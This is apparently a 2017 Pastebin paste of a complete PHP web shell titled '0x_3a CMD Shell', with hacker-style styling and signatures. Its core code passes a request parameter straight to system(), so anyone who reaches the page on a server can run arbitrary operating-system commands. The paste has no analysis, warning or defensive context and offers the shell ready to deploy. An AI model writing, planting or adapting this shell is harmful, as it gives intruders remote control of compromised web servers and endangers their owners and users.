Advertisement
MrN0body

CMD

Aug 10th, 2017
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.06 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <title>0x_3a CMD Shell</title>
  4. <head>
  5. <meta name="author" content="0x_3a,MrNobody">
  6. <meta name="keywords" content="CMD shell,MrNobody,0x_3a">
  7. <style type="text/css">
  8.     body {
  9.         background-image: url("https://pbs.twimg.com/media/DG3jXrUXoAIUjD-.jpg");
  10.         background-repeat: no-repeat;
  11.         background-position: center;
  12.         background-attachment: fixed;
  13.         background-color: #000;
  14.         text-align: left;
  15.         margin: 50px;
  16.         color: red;
  17.     }
  18.     form {
  19.         text-align: center;
  20.         padding-bottom: 20px;
  21.     }
  22.     a {
  23.         text-decoration: none;
  24.         color: #fff;
  25.     }
  26.     a:hover {
  27.         color: red;
  28.     }
  29.     footer {
  30.         font-family: Arial;
  31.         color: #fff;
  32.         text-align: center;
  33.         padding-top: 50px;
  34.     }
  35. </style>
  36. </head>
  37. <body>
  38. <FORM METHOD="GET" NAME="myform" ACTION="">
  39. <INPUT TYPE="text" NAME="0x_3a">
  40. <INPUT TYPE="submit" VALUE="Submit">
  41. </FORM>
  42. <!--0x_3a was here-->
  43. <pre>
  44. <?php
  45. if(isset($_REQUEST["0x_3a"])){
  46. system($_REQUEST["0x_3a"]);
  47. }
  48. ?>
  49. </pre>
  50. <footer>&copy; 2017 <a href="https://twitter.com/0x_3a">MrNobody</a></footer>
  51. </body>
  52. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement